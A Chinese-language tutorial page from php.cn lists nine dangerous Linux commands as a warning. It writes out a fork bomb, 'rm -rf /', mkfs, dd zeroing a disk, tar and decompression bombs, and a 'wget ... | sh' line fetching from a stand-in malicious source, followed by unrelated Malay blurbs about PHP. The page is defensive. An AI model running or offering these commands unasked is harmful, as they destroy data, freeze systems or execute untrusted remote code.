9个必须时刻警惕的php命令&代码-tutorial php-php.cn

Rumah

pembangunan bahagian belakang

tutorial php

9个必须时刻警惕的php命令&代码

伊谢尔伦

Nov 24, 2016 pm 02:31 PM

phparahan php

Linux shell/terminal命令非常强大，即使一个简单的命令就可能导致文件夹、文件或者路径文件夹等被删除。

在一些情况下，Linux甚至不会询问你而直接执行命令，导致你丢失各种数据信息。

一般来说在Web上推荐新的Linux用户执行这些命令，当然，也有人哪些写过这代码的人不这么想，因为这玩意你一写下去就不是玩笑了。

这里我收集了一些对系统有危害的Linux代码，帮助你避免他们。请记住：这些代码非常危险，甚至可以经过修改，变得更加有危害性。

还有一些事情需要注意：一些命令只在Ubuntu中有sudo前缀时是有危害的。其他发行版本的Linux，则是在作为根目录命令时会有危害。

1. Linux Fork Bomb Command

:(){ :|: & };: 以Fork Bomb闻名，是一个拒绝服务攻击的Linux 系统。:(){ :|: & };: 是一个bash函数。只要被执行，他会不断重复，直到系统被冻结。

你只能重启系统解决这个问题。所以当你在Linux界面执行这个命令时一定要注意。

2. Mv Folder/Dev/Null Command

mv folder/dev/null 也是一个危险的命令。Dev/null 或者 null device 是一个删除所有写在这个设备文件上数据的设备文件，但是，该操作提示却是写入操作执行成功。这就是我们常说的bit bucked 或者 black hole。

3. Rm -Rf Command

rm -rf命令在Linux系统中可以快速删除文件夹及其内容。如果，你不知道如何正确使用它，你就只有哭了。

列下m-rf 命令最常见的组合和选择：

rm command ：删除Linux系统的文件
rm -f command：不需提示，删除文件中的只读文件
rm -r command 循环删除文件夹的内容
rm -d command ：删除空目录，如果非空目录则不会执行该操作
rm -rf/ command：强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。
rm -rf* command ：强制删除当前目录中的所有内容(当前工作目录)和字文件夹
rm -rf. command：强制删除当前文件夹目录/子目录中的所有内容 。同rm -r.[^.]*
The rm -r.[^.]* command ：删除文件及文件夹，带有删除提示

4. Mkfs Command

如果你不知mkfs的作用，那么它也是一个危险的命令，mkfs之后写的任何命令都将会被一个空白的linux文件系统格式化、替代。

下面列举出需要管理员权限，格式化硬盘的命令：

mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat

mkfs.cramfs也可以和上面的代码做同样的事情，不过不需要管理源权限。

5. Tar Bomb

tar命令用于将多个文件以.tar格式放入一个文件中(存档文件)。Tape Archive (Tar) bomb可以由他创建。

当为压缩时，就是这个存档文件生成数以万计的相似名称文件出现在当前目录中而不是新目录。

当收到tar文件，定期创建一个新的保护目录，然后在解压前将接受的tar文件放到这个目录中，你可以避免成为tar bomb的受害者。

6. Dd Command

Dd命令用于复制&改变硬盘分区。如果，你用错地方了，那么也很危险。

下面列举dd命令：

dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda

下面这个命令会将整个主硬盘清零：dd if=/dev/zero of=/dev/had

7. Shell Script Code

有时候，你可能会被人坑，给你一个shell脚本文件，让你去下载并执行它。该脚本可能会包含一些恶意的或危险的代码。命令形式可能会是这样：wget http://some_malicious_source -O- | sh。 wget将会在sh狭隘脚本时下载脚本。

8. Malicious Source Code

也许有人会给你源代码让你编译他。代码可能是正常代码，不过，有一些恶意代码伪装在大型源代码中，如果是这样，你的系统就中枪了。如何避免?仅接受并编译可信赖来源的源代码。

9. Decompression Bomb

你已经收到一个压缩文件，你被要求提取这个看起来很小的文件，可能小到KB。事实上，该小尺寸的压缩文件包含高度压缩数据。

只要文件解压，上百GB数据会被提取，这时候，过大的数据填满硬盘导致宕机，几率就很大了。如何避免?还是那句老话，别手贱，什么文件都去接收，请接收可信任来源文件。

Kenyataan

Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn

Artikel Berkaitan

PHP: Pengenalan kepada bahasa skrip sisi pelayanApr 16, 2025 am 12:18 AM

PHP adalah bahasa skrip sisi pelayan yang digunakan untuk pembangunan web dinamik dan aplikasi sisi pelayan. 1.Php adalah bahasa yang ditafsirkan yang tidak memerlukan kompilasi dan sesuai untuk perkembangan pesat. 2. Kod PHP tertanam dalam HTML, menjadikannya mudah untuk membangunkan laman web. 3. PHP memproses logik sisi pelayan, menghasilkan output HTML, dan menyokong interaksi pengguna dan pemprosesan data. 4. PHP boleh berinteraksi dengan pangkalan data, penyerahan borang proses, dan melaksanakan tugas-tugas sampingan pelayan.

PHP dan Web: Meneroka kesan jangka panjangnyaApr 16, 2025 am 12:17 AM

PHP telah membentuk rangkaian sejak beberapa dekad yang lalu dan akan terus memainkan peranan penting dalam pembangunan web. 1) PHP berasal pada tahun 1994 dan telah menjadi pilihan pertama bagi pemaju kerana kemudahan penggunaannya dan integrasi lancar dengan MySQL. 2) Fungsi terasnya termasuk menghasilkan kandungan dinamik dan mengintegrasikan dengan pangkalan data, yang membolehkan laman web dikemas kini secara real time dan dipaparkan secara peribadi. 3) Aplikasi dan ekosistem PHP yang luas telah mendorong kesan jangka panjangnya, tetapi ia juga menghadapi kemas kini versi dan cabaran keselamatan. 4) Penambahbaikan prestasi dalam beberapa tahun kebelakangan ini, seperti pembebasan Php7, membolehkannya bersaing dengan bahasa moden. 5) Pada masa akan datang, PHP perlu menangani cabaran baru seperti kontena dan microservices, tetapi fleksibiliti dan komuniti aktif menjadikannya boleh disesuaikan.

Mengapa menggunakan PHP? Kelebihan dan faedah dijelaskanApr 16, 2025 am 12:16 AM

Manfaat utama PHP termasuk kemudahan pembelajaran, sokongan pembangunan web yang kukuh, perpustakaan dan kerangka yang kaya, prestasi tinggi dan skalabilitas, keserasian silang platform, dan keberkesanan kos. 1) mudah dipelajari dan digunakan, sesuai untuk pemula; 2) integrasi yang baik dengan pelayan web dan menyokong pelbagai pangkalan data; 3) mempunyai rangka kerja yang kuat seperti Laravel; 4) Prestasi tinggi dapat dicapai melalui pengoptimuman; 5) menyokong pelbagai sistem operasi; 6) Sumber terbuka untuk mengurangkan kos pembangunan.

Debunking the Myths: Adakah PHP benar -benar bahasa yang mati?Apr 16, 2025 am 12:15 AM

PHP tidak mati. 1) Komuniti PHP secara aktif menyelesaikan masalah prestasi dan keselamatan, dan Php7.x meningkatkan prestasi. 2) PHP sesuai untuk pembangunan web moden dan digunakan secara meluas di laman web besar. 3) PHP mudah dipelajari dan pelayan berfungsi dengan baik, tetapi sistem jenis tidak begitu ketat sebagai bahasa statik. 4) PHP masih penting dalam bidang pengurusan kandungan dan e-dagang, dan ekosistem terus berkembang. 5) Mengoptimumkan prestasi melalui OPCACHE dan APC, dan gunakan corak OOP dan reka bentuk untuk meningkatkan kualiti kod.

Perbahasan PHP vs Python: Mana yang lebih baik?Apr 16, 2025 am 12:03 AM

PHP dan Python mempunyai kelebihan dan kekurangan mereka sendiri, dan pilihannya bergantung kepada keperluan projek. 1) PHP sesuai untuk pembangunan web, mudah dipelajari, sumber komuniti yang kaya, tetapi sintaks tidak cukup moden, dan prestasi dan keselamatan perlu diberi perhatian. 2) Python sesuai untuk sains data dan pembelajaran mesin, dengan sintaks ringkas dan mudah dipelajari, tetapi terdapat kesesakan dalam kelajuan pelaksanaan dan pengurusan memori.

Tujuan PHP: Membina Laman Web DinamikApr 15, 2025 am 12:18 AM

PHP digunakan untuk membina laman web dinamik, dan fungsi terasnya termasuk: 1. Menjana kandungan dinamik dan menghasilkan laman web secara real time dengan menyambung dengan pangkalan data; 2. Proses Interaksi Pengguna dan Penyerahan Bentuk, Sahkan Input dan Menanggapi Operasi; 3. Menguruskan sesi dan pengesahan pengguna untuk memberikan pengalaman yang diperibadikan; 4. Mengoptimumkan prestasi dan ikuti amalan terbaik untuk meningkatkan kecekapan dan keselamatan laman web.

PHP: Pengendalian pangkalan data dan logik sisi pelayanApr 15, 2025 am 12:15 AM

PHP menggunakan sambungan MySQLI dan PDO untuk berinteraksi dalam operasi pangkalan data dan pemprosesan logik sisi pelayan, dan memproses logik sisi pelayan melalui fungsi seperti pengurusan sesi. 1) Gunakan MySQLI atau PDO untuk menyambung ke pangkalan data dan laksanakan pertanyaan SQL. 2) Mengendalikan permintaan HTTP dan status pengguna melalui pengurusan sesi dan fungsi lain. 3) Gunakan urus niaga untuk memastikan atomik operasi pangkalan data. 4) Mencegah suntikan SQL, gunakan pengendalian pengecualian dan sambungan penutup untuk debugging. 5) Mengoptimumkan prestasi melalui pengindeksan dan cache, tulis kod yang sangat mudah dibaca dan lakukan pengendalian ralat.

Bagaimana anda menghalang suntikan SQL di PHP? (Penyataan yang disediakan, PDO)Apr 15, 2025 am 12:15 AM

Menggunakan penyataan preprocessing dan PDO dalam PHP secara berkesan dapat mencegah serangan suntikan SQL. 1) Gunakan PDO untuk menyambung ke pangkalan data dan tetapkan mod ralat. 2) Buat kenyataan pra -proses melalui kaedah menyediakan dan lulus data menggunakan ruang letak dan laksanakan kaedah. 3) Hasil pertanyaan proses dan pastikan keselamatan dan prestasi kod.

See all articles